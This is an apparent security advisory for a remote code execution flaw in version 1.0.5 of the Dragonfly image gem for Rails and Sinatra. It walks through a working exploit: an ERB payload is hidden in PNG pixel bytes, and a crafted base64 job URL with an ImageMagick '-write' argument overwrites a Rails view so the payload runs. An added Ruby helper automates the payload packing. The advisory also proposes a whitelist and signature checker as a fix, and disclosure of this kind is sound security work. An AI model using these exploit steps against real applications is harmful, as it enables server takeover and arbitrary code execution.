RCE in the Dragonfly gem for image uploading & processing in
rails/sinatra, in version 1.0.5. (https://github.com/markevans/dragonfly)
The underlying vulnerability is that you can pass arbitrary arguments to
ImageMagick's convert, thus granting arbitrary read/write on the
filesystem. Additionally the -process flag seems to be able to load
custom modules, which might result in execution of arbitrary files.
Here is a description of _one_ way to abuse the RCE vulnerability:
$ cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$ wc exploit.rb
 3 13 63 exploit.rb
The byte length needs to be a multiple of 3 (21x3 = 63) because with
-depth 8 the rgb: coder reads 3 bytes (R, G, B) per pixel, so 63 bytes
is exactly 21 pixels:
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
Test that everything went well; the round trip back to raw bytes must be
identical, so diff should not show any differences:
$ convert exploit.png test.rgb
$ diff test.rgb exploit.rb
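To make the padding rule concrete, here is an added Ruby helper. It is not part of the original advisory and not Dragonfly's code: it pads an arbitrary payload to the 3-bytes-per-pixel layout the rgb: coder expects, picks the -size geometry, and, when ImageMagick is installed, wraps the raw file in a PNG and decodes it again to prove the bytes survive. The file names, the max_width cap and padding with spaces are assumptions of this example (spaces are harmless inside an ERB template).

```ruby
# Added example, not from the advisory or from Dragonfly: pack a payload into
# the raw "rgb:" layout so `convert` can wrap it in a lossless PNG whose
# decoded pixel bytes are the payload verbatim.
require "open3"

BYTES_PER_PIXEL = 3 # R, G, B at -depth 8

# Pad `payload` to a multiple of 3 bytes and choose image dimensions.
# Returns [padded_bytes, width, height]. max_width is an assumption of this
# example; it keeps rows short so the geometry stays readable.
def raw_rgb_for(payload, max_width: 64)
  pixels = [(payload.bytesize + BYTES_PER_PIXEL - 1) / BYTES_PER_PIXEL, 1].max
  width  = [pixels, max_width].min
  height = (pixels + width - 1) / width # round up to fill the last row
  total  = width * height * BYTES_PER_PIXEL
  padded = payload.b + (" " * (total - payload.bytesize)) # trailing spaces as padding
  [padded, width, height]
end

# The `convert` invocation the advisory runs, as an argv array (no shell).
def convert_command(raw_path, png_path, width, height)
  ["convert", "-size", "#{width}x#{height}", "-depth", "8", "rgb:#{raw_path}", png_path]
end

# Write the raw file, wrap it in a PNG and decode it back to raw bytes.
# Returns true on a byte-exact round trip, false if a convert step failed,
# nil when ImageMagick's `convert` is not installed.
def pack_and_verify(payload, raw_path, png_path)
  padded, w, h = raw_rgb_for(payload)
  File.binwrite(raw_path, padded)
  return nil unless system("command -v convert >/dev/null 2>&1")
  return false unless system(*convert_command(raw_path, png_path, w, h))
  # `rgb:-` writes the decoded pixel bytes to stdout; a lossless PNG must give
  # back exactly what went in.
  out, status = Open3.capture2("convert", png_path, "-depth", "8", "rgb:-")
  status.success? && out.b == padded
end

# Usage: ruby pack_payload.rb exploit.rb   (file name is an assumption)
if __FILE__ == $PROGRAM_NAME && ARGV[0]
  payload = File.binread(ARGV[0])
  padded, w, h = raw_rgb_for(payload)
  puts "#{payload.bytesize} bytes -> #{padded.bytesize} bytes (#{w}x#{h})"
  puts convert_command("exploit.rgb", "exploit.png", w, h).join(" ")
  puts "round trip: #{pack_and_verify(payload, 'exploit.rgb', 'exploit.png').inspect}"
end
```

The round trip is what the advisory's diff step checks; it matters because a lossy or colour-managed output format would silently corrupt the template, whereas PNG at depth 8 returns the bytes unchanged.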
Upload the picture and copy the image url, e.g.:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0
Open pry or irb and run:
Base64.decode64 "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"
=> "[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"thumb\",\"400x200#\"]]"
Base64.strict_encode64 "[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"convert\",\"-write rgb:/path/to/rails/app/views/photos/index.html.erb\"]]"
=> "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="
Go to your browser and request:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0=
and then: http://domain.tld/photos/
which will render app/views/photos/index.html.erb (now overwritten with the
payload) and spawn a pry on the terminal you called rails server from.
Of course you can use different ImageMagick flags than "-write" to
achieve the same code execution. So this really calls for a whitelist
that restricts the processors and arguments that can be sent to ImageMagick.
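The whitelist in practice, as an added Ruby example (not Dragonfly's own code): decode the job segment from a /media/ URL, using the base64-of-JSON-steps layout shown above, and reject any step that is not a fetch or a known processor with well-formed arguments, so a ["p","convert",...] step never reaches ImageMagick. The set of allowed processors, the geometry regex and the HMAC signature are illustrative choices of this example; Dragonfly's own verify_urls setting appends its own sha parameter derived from the job and the app secret, and the derivation below is not Dragonfly's.

```ruby
# Added example, not Dragonfly's code: allowlist a decoded Dragonfly job
# before it is handed to ImageMagick, with an illustrative URL signature.
require "base64"
require "json"
require "openssl"

# Processor name => predicate over its arguments. Only the processors the
# application really needs belong here; "convert" (raw ImageMagick args)
# must not. The regexes are assumptions of this example.
ALLOWED_PROCESSORS = {
  "thumb"  => ->(args) { args.size == 1 && args[0].to_s.match?(/\A\d{1,4}x\d{1,4}[#!<>]?\z/) },
  "rotate" => ->(args) { args.size == 1 && args[0].to_s.match?(/\A-?\d{1,3}\z/) },
}.freeze

# Decode the URL segment (standard or URL-safe alphabet, padding optional).
# Returns the array of steps, or nil if it is not base64-encoded JSON array.
def decode_job(segment)
  b64 = segment.tr("-_", "+/")
  b64 += "=" * ((4 - b64.size % 4) % 4)
  steps = JSON.parse(Base64.strict_decode64(b64))
  steps.is_a?(Array) ? steps : nil
rescue ArgumentError, JSON::ParserError
  nil
end

# Return the list of policy violations; an empty list means the job is acceptable.
def validate_job(steps)
  return ["job is not an array of steps"] unless steps.is_a?(Array) && steps.all?(Array)
  errors = []
  steps.each_with_index do |(kind, *args), i|
    case kind
    when "f" # fetch a stored file by uid
      uid = args[0].to_s
      errors << "step #{i}: fetch takes exactly one uid" unless args.size == 1
      if uid.start_with?("/") || uid.split("/").include?("..")
        errors << "step #{i}: uid #{uid.inspect} escapes the datastore"
      end
    when "p" # run a named processor
      name, *pargs = args
      check = ALLOWED_PROCESSORS[name]
      if check.nil?
        errors << "step #{i}: processor #{name.inspect} is not allowed"
      elsif !check.call(pargs)
        errors << "step #{i}: bad arguments for #{name}: #{pargs.inspect}"
      end
    else
      errors << "step #{i}: unknown step type #{kind.inspect}"
    end
  end
  errors
end

# Illustrative URL signature: HMAC-SHA256 over the raw segment with the app
# secret (this example's derivation, not Dragonfly's).
def sign_job(segment, secret)
  OpenSSL::HMAC.hexdigest("SHA256", secret, segment)
end

def signed?(segment, sha, secret)
  expected = sign_job(segment, secret)
  return false unless sha.is_a?(String) && sha.bytesize == expected.bytesize
  # Constant-time comparison so the check does not leak the digest byte by byte.
  sha.bytes.zip(expected.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end

# Defense in depth: the signature is enforced whenever a secret is configured,
# and the allowlist is enforced always, so sites that turn verification off
# (or leak the secret) still cannot feed raw arguments to ImageMagick.
def authorize_job(segment, sha:, secret:)
  errors = []
  errors << "missing or invalid signature" if secret && !signed?(segment, sha, secret)
  steps = decode_job(segment)
  errors << "undecodable job" if steps.nil?
  errors.concat(validate_job(steps)) if steps
  errors
end

# Usage: ruby check_job.rb <job segment>   prints the decoded steps and verdict
if __FILE__ == $PROGRAM_NAME && ARGV[0]
  puts decode_job(ARGV[0]).inspect
  errs = authorize_job(ARGV[0], sha: nil, secret: nil)
  puts(errs.empty? ? "allowed" : errs.join("\n"))
end
```

Run against the two URL segments from this advisory, the thumb job passes and the convert job is rejected at the processor name before any argument parsing, which is the property a whitelist gives you that per-flag blacklisting does not.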
The author was contacted and committed "fixes" (dragonfly version 1.0.6,
https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e).
The main fix seems to be "rename 'dos_prevention' to 'verify urls
(recommended)'". Needless to say, many websites out there will still
disable the verification for ease of deployment of e.g. javascript that
requests thumbnail versions of images. Note that this vulnerability is
still exploitable if the attacker is unable to upload images, by using
the generators to "draw" arbitrary images via ImageMagick commands.
cheers,
coco & leex
leex@room.me
http://hexgolems.com/fd/dragonfly.txt
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information